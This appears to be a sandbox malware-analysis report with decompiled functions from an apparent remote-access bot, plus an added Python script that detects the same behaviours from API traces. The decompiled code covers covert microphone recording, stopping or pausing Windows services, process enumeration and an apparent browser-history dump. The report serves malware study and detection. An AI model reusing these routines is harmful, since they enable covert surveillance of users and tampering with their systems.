                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                    • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                    • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                    • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                    • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                  • String ID:
                                  • API String ID: 573486607-0
                                  • Opcode ID: aa66e4f5bf8f0b9d55fb22090a090fc99bfa328d692b576d190f675996a42e8d
                                  • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                  • Opcode Fuzzy Hash: aa66e4f5bf8f0b9d55fb22090a090fc99bfa328d692b576d190f675996a42e8d
                                  • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E0040DBD7() {
                                  				// Microphone-capture handler: pulls fields 2, 1 and 0 out of the current
                                  				// command string (E0040180C extracts one field, atoi converts it) and
                                  				// passes the three integers to E004010CE, which per its subcall list
                                  				// opens an audio input device with waveInOpen (flags 0x30008 =
                                  				// CALLBACK_FUNCTION | WAVE_FORMAT_DIRECT) and starts recording with
                                  				// waveInStart. The global at 0x41b1f8 is cleared first. The destructor
                                  				// calls at 0040E6AC/0040E6B5 are shared with E0040D761 below, so both
                                  				// are branches of one larger routine.
                                  				char* _t7;
                                  				int _t8;
                                  				char* _t9;
                                  				int _t10;
                                  				char* _t11;
                                  				void* _t33;
                                  				void* _t40;
                                  
                                  				 *0x41b1f8 = 0;
                                  				_t7 = E0040180C(_t33 - 0x10, 0, 2);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t8 = atoi(_t7);
                                  				_t9 = E0040180C(_t33 - 0x10, 0, 1);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t10 = atoi(_t9);
                                  				_t11 = E0040180C(_t33 - 0x10, 0, 0);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				E004010CE(_t40, atoi(_t11), _t10, _t8);
                                  				E004017DD(_t33 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  Instruction addresses of the statements above, in listing order: 0x0040dbde, 0x0040dbe4, 0x0040dbeb, 0x0040dbf8, 0x0040dc01, 0x0040dc08, 0x0040dc0f, 0x0040dc17, 0x0040dc1e, 0x0040dc29, 0x0040e6a4, 0x0040e6ac, 0x0040e6b5, 0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040DBEB
                                  • atoi.MSVCRT ref: 0040DBF8
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040DC08
                                  • atoi.MSVCRT ref: 0040DC0F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DC1E
                                  • atoi.MSVCRT ref: 0040DC25
                                    • Part of subcall function 004010CE: _ftol.MSVCRT ref: 00401134
                                    • Part of subcall function 004010CE: waveInOpen.WINMM(0041B198,000000FF,Function_0001B218,0040122D,00000000,00030008), ref: 0040115E
                                    • Part of subcall function 004010CE: waveInStart.WINMM ref: 00401177
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@wave$OpenStart_ftol
                                  • String ID:
                                  • API String ID: 463581448-0
                                  • Opcode ID: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                  • Instruction ID: c3a8f3133f02346e86bcb6311be1634d36dcbe797283f91724418690e0411b93
                                  • Opcode Fuzzy Hash: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                  • Instruction Fuzzy Hash: 1D01FF72E00218DFDB04BBF1EC599ED7764EB90356B00483EE512E71E1EEB85904CB58
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00411859(void* _a4) {
                                  				// Pause a service: ControlService with code 2 (SERVICE_CONTROL_PAUSE).
                                  				// 0x40 is SERVICE_PAUSE_CONTINUE, the right OpenServiceW needs for
                                  				// pause/continue; the same constant is passed unchanged as the
                                  				// OpenSCManagerW access mask. The service name is the std::wstring
                                  				// argument whose c_str() is called below (the decompiler reuses _t6
                                  				// for its return value). No check that the SCM handle is valid: a
                                  				// failed OpenSCManagerW just makes OpenServiceW fail and takes the
                                  				// else branch. Returns 1 when ControlService succeeded, else 0.
                                  				struct _SERVICE_STATUS _v32;
                                  				short* _t6;
                                  				signed int _t14;
                                  				void* _t17;
                                  				void* _t18;
                                  
                                  				_t14 = 0;
                                  				_t6 = OpenSCManagerW(0, 0, 0x40);
                                  				_t18 = _t6;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t17 = OpenServiceW(_t18, _t6, 0x40);
                                  				if(_t17 != 0) {
                                  					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;
                                  					CloseServiceHandle(_t18);
                                  					CloseServiceHandle(_t17);
                                  				} else {
                                  					CloseServiceHandle(_t18);
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t14;
                                  			}

                                  Instruction addresses of the statements above, in listing order: 0x00411862, 0x00411868, 0x00411873, 0x00411875, 0x00411883, 0x00411887, 0x004118a8, 0x004118ab, 0x004118ae, 0x00411889, 0x0041188a, 0x0041188a, 0x004118b3, 0x004118bf

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                  • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E004118C0(void* _a4) {
                                  				// Resume a service: identical to E00411859 except that ControlService
                                  				// is sent code 3 (SERVICE_CONTROL_CONTINUE). The service handle is
                                  				// again opened with 0x40 (SERVICE_PAUSE_CONTINUE), which covers both
                                  				// pause and continue. Returns 1 on success, else 0.
                                  				struct _SERVICE_STATUS _v32;
                                  				short* _t6;
                                  				signed int _t14;
                                  				void* _t17;
                                  				void* _t18;
                                  
                                  				_t14 = 0;
                                  				_t6 = OpenSCManagerW(0, 0, 0x40);
                                  				_t18 = _t6;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t17 = OpenServiceW(_t18, _t6, 0x40);
                                  				if(_t17 != 0) {
                                  					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;
                                  					CloseServiceHandle(_t18);
                                  					CloseServiceHandle(_t17);
                                  				} else {
                                  					CloseServiceHandle(_t18);
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t14;
                                  			}

                                  Instruction addresses of the statements above, in listing order: 0x004118c9, 0x004118cf, 0x004118da, 0x004118dc, 0x004118ea, 0x004118ee, 0x0041190f, 0x00411912, 0x00411915, 0x004118f0, 0x004118f1, 0x004118f1, 0x0041191a, 0x00411926

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                  • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00411760(void* _a4) {
                                  				// Stop a service: same shape as E00411859/E004118C0, but the handle is
                                  				// opened with 0x20 (SERVICE_STOP) and ControlService is sent code 1
                                  				// (SERVICE_CONTROL_STOP). 0x20 is again passed unchanged as the
                                  				// OpenSCManagerW access mask. Returns 1 on success, else 0.
                                  				struct _SERVICE_STATUS _v32;
                                  				short* _t6;
                                  				signed int _t14;
                                  				void* _t17;
                                  				void* _t18;
                                  
                                  				_t14 = 0;
                                  				_t6 = OpenSCManagerW(0, 0, 0x20);
                                  				_t18 = _t6;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t17 = OpenServiceW(_t18, _t6, 0x20);
                                  				if(_t17 != 0) {
                                  					_t14 = 0 | ControlService(_t17, 1,  &_v32) != 0x00000000;
                                  					CloseServiceHandle(_t18);
                                  					CloseServiceHandle(_t17);
                                  				} else {
                                  					CloseServiceHandle(_t18);
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t14;
                                  			}

                                  Instruction addresses of the statements above, in listing order: 0x00411769, 0x0041176f, 0x0041177a, 0x0041177c, 0x0041178a, 0x0041178e, 0x004117af, 0x004117b2, 0x004117b5, 0x00411790, 0x00411791, 0x00411791, 0x004117ba, 0x004117c6

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,00411280), ref: 0041176F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,00411280), ref: 0041177C
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411280), ref: 00411784
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 00411791
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B2
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411280), ref: 004117BA
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction ID: b89de82e4dcd107d12e5f2e386de490b738cfb46e6195f9b9e1884d6b0831d1c
                                  • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction Fuzzy Hash: 23F0AF71100618EFD3106FB4AC88EFF3F6CEF89390B044025FA06921A0DB648D468AE9
                                  Uniqueness Score: -1.00%
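The three service-control handlers above (stop, pause, continue) differ only in the ControlService code and the OpenServiceW access mask, and the microphone handler E0040DBD7 is recognisable by its waveInOpen/waveInStart pair; those argument values are what a trace-based detector keys on. The following Python is an added example, not part of this report and not code from the sample: it parses listing lines in the format this report prints under "APIs", maps the hex arguments to their winsvc.h / mmsystem.h names, and flags service control, microphone capture and Toolhelp32 process enumeration. The trace is constructed to mirror the report's listings, and the argument positions it reads (access mask as OpenServiceW's third argument, control code as ControlService's second, flags as waveInOpen's sixth) follow the decompiled calls above.

```python
"""Parse sandbox-style "APIs" listing lines and flag the behaviours the
decompiled functions above implement: service control (ControlService),
microphone capture (waveInOpen/waveInStart) and process enumeration
(Toolhelp32). Added example; the trace at the bottom is constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass

# One listing line: optional "Part of subcall function XXXXXXXX:" prefix,
# API name (may be a mangled C++ export), ".MODULE", optional "(args)",
# then "ref: ADDR". The bullet is optional so pasted lines also parse.
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Constants from winsvc.h and mmsystem.h; the listings carry them as hex.
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
SERVICE_ACCESS = {0x10: "SERVICE_START", 0x20: "SERVICE_STOP",
                  0x40: "SERVICE_PAUSE_CONTINUE", 0x80: "SERVICE_INTERROGATE"}
WAVE_OPEN_FLAGS = {0x30000: "CALLBACK_FUNCTION", 0x8: "WAVE_FORMAT_DIRECT"}


@dataclass
class Call:
    name: str
    module: str
    args: list[str]
    ref: int
    subcall: str | None = None


def parse_line(line: str) -> Call | None:
    m = LINE_RE.match(line)
    if m is None:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return Call(m["name"], m["module"], args, int(m["ref"], 16), m["sub"])


def hexarg(call: Call, idx: int) -> int | None:
    """Argument idx as an int, or None when the sandbox printed '?'."""
    if idx >= len(call.args):
        return None
    try:
        return int(call.args[idx], 16)
    except ValueError:
        return None


def flag_names(value: int, table: dict[int, str]) -> str:
    """Decode a bitmask into 'A|B', keeping any unknown bits as hex."""
    names, rest = [], value
    for bit, name in table.items():
        if value & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:x}")
    return "|".join(names)


def detect(lines: list[str]) -> list[str]:
    """Walk the calls in order and emit one finding per behaviour."""
    findings: list[str] = []
    service_access: int | None = None   # from the last OpenServiceW
    wave_flags: int | None = None       # set by waveInOpen, consumed by waveInStart
    snapshot_taken = False
    for c in filter(None, map(parse_line, lines)):
        if c.name == "OpenServiceW":
            service_access = hexarg(c, 2)
        elif c.name == "ControlService":
            code = hexarg(c, 1)
            ctl = SERVICE_CONTROL.get(code, f"control {code}")
            acc = flag_names(service_access, SERVICE_ACCESS) if service_access is not None else "?"
            findings.append(f"service control: {ctl} (handle access {acc}) @ {c.ref:08X}")
        elif c.name == "waveInOpen":
            wave_flags = hexarg(c, 5)
        elif c.name == "waveInStart" and wave_flags is not None:
            findings.append(f"microphone capture: waveInOpen flags "
                            f"{flag_names(wave_flags, WAVE_OPEN_FLAGS)} then waveInStart @ {c.ref:08X}")
            wave_flags = None
        elif c.name == "CreateToolhelp32Snapshot":
            snapshot_taken = True
        elif c.name in ("Process32FirstW", "Process32First") and snapshot_taken:
            findings.append(f"process enumeration: Toolhelp32 walk @ {c.ref:08X}")
            snapshot_taken = False
    return findings


# Constructed trace modelled on the report's listings (not a live capture).
TRACE = [
    "• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 004118CF",
    "• OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 004118E4",
    "• ControlService.ADVAPI32(00000000,00000003,?), ref: 00411900",
    "• CloseServiceHandle.ADVAPI32(00000000), ref: 00411912",
    "  • Part of subcall function 004010CE: waveInOpen.WINMM(0041B198,?,?,0040122D,00000000,00030008), ref: 0040115E",
    "  • Part of subcall function 004010CE: waveInStart.WINMM ref: 00401177",
    "  • Part of subcall function 00409EAA: CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF",
    "  • Part of subcall function 00409EAA: Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0",
    "• ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004118DC",
]

if __name__ == "__main__":
    for finding in detect(TRACE):
        print(finding)
```

On the constructed trace this reports a SERVICE_CONTROL_CONTINUE on a handle opened with SERVICE_PAUSE_CONTINUE, a waveInOpen(CALLBACK_FUNCTION|WAVE_FORMAT_DIRECT) followed by waveInStart, and a Toolhelp32 walk. Arguments the sandbox could not recover are printed as "?" in these listings and come back as None from hexarg, so the rules degrade to "?" rather than misreporting a value.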

                                  C-Code - Quality: 43%
                                  			E0040D761(void* __ecx, void* __eflags) {
                                  				// Process-list report: converts the bot's own PID to decimal with
                                  				// _itoa, concatenates it (std::string operator+, the L00414140 and
                                  				// L00414170 thunks) with the list E00409EAA builds from a Toolhelp32
                                  				// snapshot (Process32FirstW/NextW, see its subcall entries below), and
                                  				// hands the result to E004020C2 together with the constant 0x4f
                                  				// (E004020C2 copies the std::string at 0x41be70 per its subcall list).
                                  				// The destructor calls at 0040E69B-0040E6C1 are shared with E0040DBD7
                                  				// above, so both are branches of one larger routine. Quality 43%:
                                  				// the argument list of the first destructor call is decompiler noise.
                                  				void* _t15;
                                  				void* _t20;
                                  				void* _t30;
                                  				void* _t32;
                                  				void* _t34;
                                  				void* _t38;
                                  
                                  				_t38 = __eflags;
                                  				_t20 = __ecx;
                                  				__imp___itoa(GetCurrentProcessId(), _t32 - 0x30, 0xa);
                                  				_t15 = _t32 - 0x60;
                                  				L00414140();
                                  				L00414170();
                                  				E004020C2(0x41be70, 0x4f, _t34);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t15, _t15, E00409EAA(_t38, _t32 - 0x150), _t30, _t32 - 0x30, _t20);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				E004017DD(_t32 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  Instruction addresses of the statements above, in listing order: 0x0040d761, 0x0040d761, 0x0040d76e, 0x0040d78a, 0x0040d78e, 0x0040d798, 0x0040d7a7, 0x0040d7af, 0x0040e69b, 0x0040e6a4, 0x0040e6ac, 0x0040e6b5, 0x0040e6c1

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D767
                                  • _itoa.MSVCRT ref: 0040D76E
                                    • Part of subcall function 00409EAA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00409EAA: CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                    • Part of subcall function 00409EAA: Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                    • Part of subcall function 00409EAA: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                    • Part of subcall function 00409EAA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D78E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D798
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D7AF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
